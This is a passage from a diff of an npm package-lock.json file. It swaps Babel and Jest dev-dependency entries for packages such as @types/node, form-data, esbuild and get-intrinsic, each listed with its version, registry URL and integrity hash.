"https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@types/matcher": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@types/matcher/-/matcher-1.1.0.tgz", + "integrity": "sha512-ABJ5kIpPHprtDTLh3xoB7QoGsqhGa9oUvLRiSBe/Sj0fPrxSpZezkussmjiR+QWtjqhrmfyV9vs6BpPPfygDUQ==", "dev": true, - "engines": { - "node": ">=0.8.0" - } + "license": "MIT" }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@types/mustache": { + "version": "4.2.6", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", + "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", "dev": true, - "engines": { - "node": ">=4" + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", + "license": "MIT", + "dependencies": { + "undici-types": "~6.21.0" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "node_modules/@types/node/node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "license": "MIT" + }, + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 14" } }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", + "license": "Python-2.0" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", + "license": "MIT" + }, + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" + }, + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + }, + "engines": { + "bare": ">=1.16.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-os": "^3.0.1" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "streamx": "^2.21.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">= 0.4" } }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, + "node_modules/clone-regexp": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/clone-regexp/-/clone-regexp-3.0.0.tgz", + "integrity": "sha512-ujdnoq2Kxb8s3ItNBtnYeXdm07FcU0u8ARAT1lQ2YdMwQC+cdiXX8KoqMVuglztILivceTtp4ivqGSmEmhBUJw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "is-regexp": "^3.0.0" }, "engines": { - "node": ">=6.9.0" + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "delayed-stream": "~1.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">= 0.8" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "node_modules/convert-hrtime": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/convert-hrtime/-/convert-hrtime-5.0.0.tgz", + "integrity": "sha512-lOETlkIeYSJWcbbcvjRKGxVMXJR+8+OQb/mTPbA4ObPMytYIsUbuOE0Jzy60hjARYszq1id0j8KgVhC+WGZVTg==", + "license": "MIT", + "engines": { + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "ms": "^2.1.3" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "license": "MIT", + "engines": { + "node": ">=0.4.0" } }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">= 0.4" } }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "once": "^1.4.0" } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">= 0.4" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">= 0.4" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" + "es-errors": "^1.3.0" }, "engines": { - "node": ">=6.9.0" + "node": ">= 0.4" } }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, "engines": { - "node": ">=6.9.0" + "node": ">= 0.4" } }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", + "node_modules/esbuild": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.5.tgz", + "integrity": "sha512-P8OtKZRv/5J5hhz0cUAdu/cLuPIKXpQl1R9pZtvmHWQvrAUVd0UNIPT4IB4W3rNOqVO0rlqHmCIbSwxh/c9yUQ==", "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" }, "engines": { - "node": ">=6.9.0" + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.5", + "@esbuild/android-arm": "0.25.5", + "@esbuild/android-arm64": "0.25.5", + "@esbuild/android-x64": "0.25.5", + "@esbuild/darwin-arm64": "0.25.5", + "@esbuild/darwin-x64": "0.25.5", + "@esbuild/freebsd-arm64": "0.25.5", + "@esbuild/freebsd-x64": "0.25.5", + "@esbuild/linux-arm": "0.25.5", + "@esbuild/linux-arm64": "0.25.5", + "@esbuild/linux-ia32": "0.25.5", + "@esbuild/linux-loong64": "0.25.5", + "@esbuild/linux-mips64el": "0.25.5", + "@esbuild/linux-ppc64": "0.25.5", + "@esbuild/linux-riscv64": "0.25.5", + "@esbuild/linux-s390x": "0.25.5", + "@esbuild/linux-x64": "0.25.5", + "@esbuild/netbsd-arm64": "0.25.5", + "@esbuild/netbsd-x64": "0.25.5", + "@esbuild/openbsd-arm64": "0.25.5", + "@esbuild/openbsd-x64": "0.25.5", + "@esbuild/sunos-x64": "0.25.5", + "@esbuild/win32-arm64": "0.25.5", + "@esbuild/win32-ia32": "0.25.5", + "@esbuild/win32-x64": "0.25.5" } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true + "node_modules/escape-string-regexp": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-5.0.0.tgz", + "integrity": "sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==", + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" + }, + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "license": "MIT", "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" }, "engines": { - "node": ">=8" + "node": ">= 6" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" + "node_modules/function-timeout": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/function-timeout/-/function-timeout-0.1.1.tgz", + "integrity": "sha512-0NVVC0TaP7dSTvn1yMiy6d6Q8gifzbvQafO46RtLG/kHJUBNd+pVRGOBoK44wNBvtSPUJRfdVvkFdD3p0xvyZg==", + "license": "MIT", + "engines": { + "node": ">=14.16" }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, "engines": { - "node": ">=8" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": 